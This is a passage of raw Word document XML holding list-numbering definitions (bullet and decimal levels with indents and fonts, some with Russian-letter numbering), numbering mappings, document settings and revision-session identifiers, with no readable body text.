          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:bCs w:val="0"/>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E4964" w14:textId="77777777" w:rsidR="00C218F6" w:rsidRDefault="00C218F6">
    <w:pPr>
      <w:pStyle w:val="afa"/>
      <w:jc w:val="right"/>
    </w:pPr>
  </w:p>
  <w:p w14:paraId="59C24031" w14:textId="77777777" w:rsidR="00C218F6" w:rsidRDefault="00C218F6">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1C28E16"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="2"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="643"/>
        </w:tabs>
        <w:ind w:left="643" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="00000002"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="00000002"/>
    <w:name w:val="WW8Num2"/>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15:restartNumberingAfterBreak="0">
    <w:nsid w:val="03ED44EC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="930251E2"/>
    <w:lvl w:ilvl="0" w:tplc="0419000F">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="51BE4752">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"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4903F0F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B5F29724"/>
    <w:lvl w:ilvl="0" w:tplc="FC701FB2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="20"/>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08B068A2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2AFEC94E"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="1"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="999" w:hanging="432"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="21"/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1389" w:hanging="680"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="3"/>
      <w:lvlText w:val="%1.%2.%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1287" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="4"/>
      <w:lvlText w:val="%1.%2.%3.%4"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1006" w:hanging="864"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="5"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1717" w:hanging="1008"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="6"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1719" w:hanging="1152"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="7"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1863" w:hanging="1296"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="8"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2007" w:hanging="1440"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="9"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8.%9"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2151" w:hanging="1584"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0BE20B8D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B2AAA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E24A53"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="34B8D798"/>
    <w:lvl w:ilvl="0" w:tplc="7FC2B4A6">
      <w:start w:val="1"/>
      <w:numFmt w:val="russianLower"/>
      <w:pStyle w:val="a"/>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23A653BB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="58C4C8F6"/>
    <w:lvl w:ilvl="0" w:tplc="FC8C2C18">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="a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250E3643"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A3241794"/>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pStyle w:val="a1"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="720" w:hanging="36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9" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="29A2622A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E71E2014"/>
    <w:lvl w:ilvl="0" w:tplc="14AEA8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AFF2F24"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5DCCE37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40827C09"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="547C75F6"/>
    <w:lvl w:ilvl="0" w:tplc="EBCC79AA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="—"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"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2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4AE33A09"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="309E839E"/>
    <w:lvl w:ilvl="0" w:tplc="EBCC79AA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="—"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5039" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="04190003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5759" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="04190005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6479" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="04190001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7199" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="04190003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7919" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="04190005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8639" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="04190001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="9359" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="04190003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="10079" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="04190005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="10799" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4AF72553"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5B729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241C98"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6F4ADE7E"/>
    <w:lvl w:ilvl="0" w:tplc="0419000F">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="51BE4752">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"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D8072CD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E1E6B786"/>
    <w:lvl w:ilvl="0" w:tplc="0419000F">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="588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00523BE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BFCA2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123824"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D9EAA19A"/>
    <w:lvl w:ilvl="0" w:tplc="25F0B318">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="a2"/>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67FC70B2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6F4C2824"/>
    <w:lvl w:ilvl="0" w:tplc="70526CC8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="a3"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1571" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="04190019">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9B51D24"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6F544936"/>
    <w:styleLink w:val="22"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="1080"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1800"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="1440"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="(%4)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="1800"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="(%5)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2520"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="2160"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="(%6)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2880"/>
        </w:tabs>
        <w:ind w:left="1800" w:firstLine="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3240"/>
        </w:tabs>
        <w:ind w:left="2160" w:firstLine="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3600"/>
        </w:tabs>
        <w:ind w:left="2520" w:firstLine="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3960"/>
        </w:tabs>
        <w:ind w:left="2880" w:firstLine="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="20" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="6BEC1664"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5B52EE4C"/>
    <w:lvl w:ilvl="0" w:tplc="0419000F">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="51BE4752">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:r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15:restartNumberingAfterBreak="0">
    <w:nsid w:val="721A177E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9E3AB358"/>
    <w:lvl w:ilvl="0" w:tplc="4B4E73C2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="-"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="58DA24F8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="C4C69742" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2880"/>
        </w:tabs>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="31B0BE02" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3600"/>
        </w:tabs>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="D8F85A44" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="4320"/>
        </w:tabs>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="5FE8CD62" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="5040"/>
        </w:tabs>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="D40EBF0A" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="5760"/>
        </w:tabs>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="531CF3B6" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="6480"/>
        </w:tabs>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="208A96DA" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="7200"/>
        </w:tabs>
        <w:ind w:left="7200" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="491529689">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1755007452">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1861117219">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1558928667">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1848933880">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="773939413">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="710110315">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1755936847">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1799107424">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1061100782">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="169294442">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="72363028">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="19231770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494682617">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29901858">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86398265">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945259063">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="211161708">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="2142379472">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="625159977">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="815295553">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="1713114162">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="1469781053">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="4479278">
    <w:abstractNumId w:val="17"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="885140440">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ocumentProtection w:formatting="1" w:enforcement="0"/>
  <w:styleLockTheme/>
  <w:styleLockQFSet/>
  <w:defaultTabStop w:val="709"/>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53ADA"/>
    <w:rsid w:val="0000038E"/>
    <w:rsid w:val="000013B8"/>
    <w:rsid w:val="00014AB0"/>
    <w:rsid w:val="000151CA"/>
    <w:rsid w:val="00020A6C"/>
    <w:rsid w:val="000215CB"/>
    <w:rsid w:val="00022457"/>
    <w:rsid w:val="00023928"/>
    <w:rsid w:val="0002533B"/>
    <w:rsid w:val="00026C9E"/>
    <w:rsid w:val="00031260"/>
    <w:rsid w:val="00033516"/>
    <w:rsid w:val="00035C4C"/>
    <w:rsid w:val="0003656F"/>
    <w:rsid w:val="000417B1"/>
    <w:rsid w:val="00041A1B"/>
    <w:rsid w:val="00042130"/>
    <w:rsid w:val="000477A1"/>
    <w:rsid w:val="0005188E"/>
    <w:rsid w:val="00057122"/>
    <w:rsid w:val="0006172D"/>
    <w:rsid w:val="00063786"/>
    <w:rsid w:val="00063A15"/>
    <w:rsid w:val="000719A2"/>
    <w:rsid w:val="00080755"/>
    <w:rsid w:val="00080B99"/>
    <w:rsid w:val="00082AD0"/>
    <w:rsid w:val="00085FB4"/>
    <w:rsid w:val="00090579"/>
    <w:rsid w:val="0009557D"/>
    <w:rsid w:val="00095910"/>
    <w:rsid w:val="0009664F"/>
    <w:rsid w:val="0009760B"/>
    <w:rsid w:val="00097CF1"/>
    <w:rsid w:val="000A1EF3"/>
    <w:rsid w:val="000A461F"/>
    <w:rsid w:val="000A4A35"/>
    <w:rsid w:val="000B0124"/>
    <w:rsid w:val="000B1F41"/>
    <w:rsid w:val="000B2C5A"/>
    <w:rsid w:val="000B5D9C"/>
    <w:rsid w:val="000B61E9"/>
    <w:rsid w:val="000C3060"/>
    <w:rsid w:val="000C5D7A"/>
    <w:rsid w:val="000D08AA"/>
    <w:rsid w:val="000D1373"/>
    <w:rsid w:val="000D7F80"/>
    <w:rsid w:val="000E24E3"/>
    <w:rsid w:val="000E37AA"/>
    <w:rsid w:val="000F0A10"/>
    <w:rsid w:val="000F10D9"/>
    <w:rsid w:val="000F7B8F"/>
    <w:rsid w:val="00100CD3"/>
    <w:rsid w:val="00111F59"/>
    <w:rsid w:val="00112195"/>
    <w:rsid w:val="00117914"/>
    <w:rsid w:val="00125271"/>
    <w:rsid w:val="00126164"/>
    <w:rsid w:val="00126E90"/>
    <w:rsid w:val="001358B1"/>
    <w:rsid w:val="00136100"/>
    <w:rsid w:val="00136A7C"/>
    <w:rsid w:val="00141709"/>
    <w:rsid w:val="001417EE"/>
    <w:rsid w:val="00151BEC"/>
    <w:rsid w:val="001558A5"/>
    <w:rsid w:val="001560E7"/>
    <w:rsid w:val="00162375"/>
    <w:rsid w:val="0016585B"/>
    <w:rsid w:val="00173F59"/>
    <w:rsid w:val="0017594C"/>
    <w:rsid w:val="00177798"/>
    <w:rsid w:val="001832F5"/>
    <w:rsid w:val="00185B15"/>
    <w:rsid w:val="00186C95"/>
    <w:rsid w:val="00190350"/>
    <w:rsid w:val="001919F4"/>
    <w:rsid w:val="00191EE2"/>
    <w:rsid w:val="00195C43"/>
    <w:rsid w:val="001A0BA1"/>
    <w:rsid w:val="001A116B"/>
    <w:rsid w:val="001A4F9D"/>
    <w:rsid w:val="001B1B03"/>
    <w:rsid w:val="001B32F7"/>
